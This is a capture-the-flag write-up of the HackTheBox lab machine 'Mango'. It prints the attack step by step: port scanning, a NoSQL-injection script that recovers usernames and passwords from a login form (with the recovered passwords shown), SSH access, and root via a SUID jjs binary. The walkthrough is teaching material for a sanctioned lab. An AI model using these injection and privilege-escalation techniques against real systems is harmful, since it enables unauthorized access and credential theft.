Categories
HackTheBox Writeups

[HTB] – Mango

Todays writeup is on Mango, a medium Linux box released on October 26th 2019 on HackTheBox.

If you have a VIP access on the website, you can access it here : https://www.hackthebox.eu/home/machines/profile/214

Recon

Using nmap, we look for open ports.

nmap -A -p- -T4 10.10.10.162

We are using basic nmap arguments here :

  • -A : enables OS detection (-O), version scanning (-sV), script scanning (-sC) and traceroute (--traceroute)
  • -p- : nmap scans every port
  • -T4 : allows you to ajust the Timing Template (according to your bandwith, and the speed you're seeking)

The results are as following :

┌─|Log_s [18:31] :~                                                                                  
└──╼ $ nmap -A -p- -T4 10.10.10.162                                                             
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-03 18:31 CEST
Nmap scan report for 10.10.10.162
Host is up (0.10s latency).
Not shown: 65351 closed ports, 181 filtered ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
|   256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_  256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Mango | Search Base
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after:  2020-09-26T14:21:19
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 885.64 seconds

There are no outstanding services. We have common SSH and HTTP(S) services running on common ports.

Next step of recon is to take a look at it in a web browser.

port 80 access attempt

On port 80, we get a Forbidden error. According to our scan, next one to try out is port 443 by typing the following request in the search bar.

10.10.10.163:443

Now things get interesting. We know ourselfs in a safe environment, but let's check the certificate anyway.

We have a subdomain : "stagin-order.mango.htb". Lets add it to our /etc/hosts file

echo 10.10.10.162 mango.htb staging-order.mango.htb >> /etc/hosts

Now let's see what is going on, by navigating to the subdomain.

We got ourselfs a nice connection form. That's about it for the recon on this box

Own User

For the first part, the boxe's name, and the picture on the connection form are big hints. There is a high probability that the database handling credentials is based on MangoDB.

After a few researches we find an enumeration based exploit on mangoDB, that enumerates usernames and passwords : https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration

We try to use the example command given in the README file, and it works.

─|Log_s [19:25] :~
└──╼ $ python nosqli-user-pass-enum.py -u http://staging-order.mango.htb -up username -pp password -ep username -op login:login,submit:submit
Warning: No method given. Using POST as the method. (You can give the method with -m)
Pattern found that starts with 'a'
Pattern found: ad
Pattern found: adm
Pattern found: admi
Pattern found: admin                                                                                                                            
username found: admin                                                                                                                                                                                                                                                
Pattern found that starts with 'm'                                                                                                              
Pattern found: ma                                                                                                                               
Pattern found: man                                                                                                                              
Pattern found: mang                                                                                                                             
Pattern found: mango                                                                                                                            
username found: mango

We do the same for the passwords by slightly changing the command to

─|Log_s [19:25] :~
└──╼ $python nosqli-user-pass-enum.py -u http://staging-order.mango.htb -up username -pp password -ep password -op login:login,submit:submit
Warning: No method given. Using POST as the method. (You can give the method with -m)                                                                                                                   
Pattern found that starts with 'h'                                                                                                              
Pattern found: h3                                                                                                                               
Pattern found: h3m                                                                                                                              
Pattern found: h3mX                                                                                                                             
Pattern found: h3mXK                                                                                                                            
Pattern found: h3mXK8                                                                                                                           
Pattern found: h3mXK8R                                                                                                                          
Pattern found: h3mXK8Rh                                                                                                                         
Pattern found: h3mXK8RhU                                                                                                                        
Pattern found: h3mXK8RhU~                                                                                                                       
Pattern found: h3mXK8RhU~f                                                                                                                      
Pattern found: h3mXK8RhU~f{                                                                                                                     
Pattern found: h3mXK8RhU~f{]                                                                                                                    
Pattern found: h3mXK8RhU~f{]f                                                                                                                   
Pattern found: h3mXK8RhU~f{]f5                                                                                                                  
Pattern found: h3mXK8RhU~f{]f5H                                                                                                                 
password found: h3mXK8RhU~f{]f5H                                                                                                                                                                                                                                     
Pattern found that starts with 't'                                                                                                              
Pattern found: t9                                                                                                                               
Pattern found: t9K                                                                                                                              
Pattern found: t9Kc                                                                                                                             
Pattern found: t9KcS                                                                                                                            
Pattern found: t9KcS3                                                                                                                           
Pattern found: t9KcS3>                                                                                                                          
Pattern found: t9KcS3>!                                                                                                                         
Pattern found: t9KcS3>!0                                                                                                                        
Pattern found: t9KcS3>!0B                                                                                                                       
Pattern found: t9KcS3>!0B#                                                                                                                      
Pattern found: t9KcS3>!0B#2                                                                                                                     
password found: t9KcS3>!0B#2

We now got 2 usernames admin and mango, and two passwords, h3mXK8RhU~f{]f5H and t9KcS3>!0B#2.

Now trying to ssh using those credentials. We are unable to connect with admin, but mango works !

─|Log_s [19:25] :~
└──╼ $ ssh mango@10.10.10.162
mango@10.10.10.162's password: 
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Apr 17 14:36:00 UTC 2020

  System load:  0.21               Processes:            116
  Usage of /:   26.0% of 19.56GB   Users logged in:      1
  Memory usage: 12%                IP address for ens33: 10.10.10.162
  Swap usage:   4%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

122 packages can be updated.
18 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Fri Apr 17 14:21:31 2020 from 10.10.14.205
mango@mango:~$ 

Unfortunately, the user.txt file is located in /home/admin. But that's not a problem, given we have the required credentials.

mango@mango:~$ su admin
Password :
$ whoami
admin
$

Now a simple

cat /home/admin/user.txt

and the flag appears us.

Privesc (Own Root)

For the second part, we start with the well know enumeration script LinEnum.sh, and find an interesting file with SUID that we can exploit.

[+] Possibly intersting SUID files:
-rwsr-sr-- 1 root admin 10352 Jul 18 18:21 /usr/lib/jvm/java-11-openjdk-adm64/bin/jjs

After looking up jjs, it appears to be a binary invoking the Nashorn engine, a JavaScript engine. In other words, it allows us to execute JavaScript commands in our terminal. But the interesting part here, is that we do so with root privilege.

There are two ways of solving this, first, use the JavaScript prompt to load the content of /root/root.txt in a buffer and print it character by character.

The other way (I suck at JS), is to run the binary with the file path as argument, to trigger an error. The error message will probably display the flag, as it can't interpret the content of the file as JS instructions.

$ /usr/lib/jvm/java-11-openjdk-adm64/bin/jjs /root/root.txt

And here is our root flag !

Thanks for reading, see you for a another writeup 😉

Leave a Reply

Your email address will not be published.